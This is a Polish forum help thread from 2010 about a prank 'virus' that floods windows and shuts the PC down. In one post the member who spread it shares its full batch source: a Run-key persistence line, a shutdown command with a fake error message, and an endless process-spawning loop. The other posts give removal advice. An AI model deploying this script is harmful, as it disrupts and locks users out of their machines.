View Full Version : Pomocy/wirus
.:Speed Fireman:.
21-03-2010, 22:21
Witam.
Dzisiejszego dnia ściągnąłem gownianego wirusa zamieszczonego przez Poziomka.
Gdy wlączam komputer to wyświetla się milion okienek w tym okienko informujące mnie, że jest błąd krytyczny i, że komuter wyłączy się za 10 sec.
Pomóżcie mi co mogę z tym zrobić. Proszę was nie piszcie tylko o formacie.
Swoją drogą czemu ten idiota Poziomkuwa nie dostał perma?
Jeżeli będę musiał sformatować kompa to sprawa trafia do sądu :)
Lady Knighter
21-03-2010, 22:25
Usuń ten plik/wirus na tzw. "Stan alarmowy" (czyli komp zamulony jest i nie może się otworzyć normalnie) i spróbuj to usunąć. Jak nie, to tylko format.
Tak btw. jak nie ma 13 lat to nie podasz go do sądu.
@Down
"EDIT"
Włączasz komputer i powinno wyskoczyć jaki windows
}
} tu kilka windowsów powinno być
}
Niżej powinno to być, chyba że masz jakiś nowszy to only format :/
21-03-2010, 22:36
Moze to glupie pytanie, ale jak sie wlacza tryb awaryjny? F8 cisne i nic
Tym awaryjny powiadasz?
Gdy ładuje się system, zrób restarta.
Zobaczysz kilka opcji, w której jest- uruchom windows w systemie awaryjnym (albo jakoś tak).
ps. Format.
Tryb Awaryjny włącza się spamując F8 przez cały czas gdy są wyświetlane informacje w DOSie.
Poziomkuwa
22-03-2010, 14:18
Hahahahah, to nawet wirus nie jest. Tylko komenda shutdown z komendą start : s
Po prostu wchodzisz w tryb awaryjny i to wypieprzasz z autostartu.
@edit
Tutaj masz kod batcha:
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MyApp /t REG_SZ /d %0 /f
@echo off
shutdown -s -t 10 -c "Błąd krytyczny, bla bla bla bla"
:a
start
goto a
To wszystko wpisane w notatniku i zapisane jako blablabla.BAT
A ten błąd krytyczny sam wpisałem, nic ci z kompem się nie stało XD
@edit2
Aha, i jak włączy ci się komputer to wchodzisz szybko w Uruchom i wpisujesz "shutdown -a" to ci się nie wyłączy.
Greyback
22-03-2010, 16:20
Jeżeli będę musiał sformatować kompa to sprawa trafia do sądu
Boże ile ty masz lat? Nie wiesz jak się biosa włącza OMG
Jak pokaże ci się te błąd krytyczny i że kom się wyłączy za 10 sek to wpisz w uruchom "shutdown -a" lub "shutdown -h" nie pamiętam dokładnie to się wyłączy jak nie umiesz tego z rejestru wywalić to ściągnij Hijackthis i daj loga mi na priv to powiem ci jak dalej masz robić.
ps. Biosa nie nie zawsze włącza się f8 powiedział bym, że nie zbyt często najczęściej bios włącza się del ale może być i f2 lub f11
22-03-2010, 18:27
Gdy włączam pc to nie jestem wstawie wpisac szybko shutdown......
Gdy wciskam f8 i wyswietlaja mi sie systemy to nie dzialaja strzalki i nie moge zmienic trybu na awaryjny
////
DOBRA OGARNĄŁEM TO. TERAZ JAK TO USUNĄĆ? INTERNET NIE CHCE MI DZIAŁAĆ ;/
Poziomkuwa
22-03-2010, 22:37
Ziomuś, to ci strzałek i internetu nie mogło popsuć bo to jest tak jakbyś miliony razy uruchamiał ten sam program : d Usuń to co ściągnąłeś i zobacz czy jest w autostarcie. jeśli tak to też usuń i po wszystkim. Na przyszłość nie ściągaj niczego z tego forum.
w trybie awaryjnym weź start - > uruchom i wpisz msconfig. Zakładka uruchamiane i wyszukaj to cholerstwo, odznacz, zrestartuj komputer i powinno śmigać. Jak już to opanujesz to bez problemu znajdziesz Twój problem.
vBulletin v4.2.5, Copyright ©2000-2025, Jelsoft Enterprises Ltd.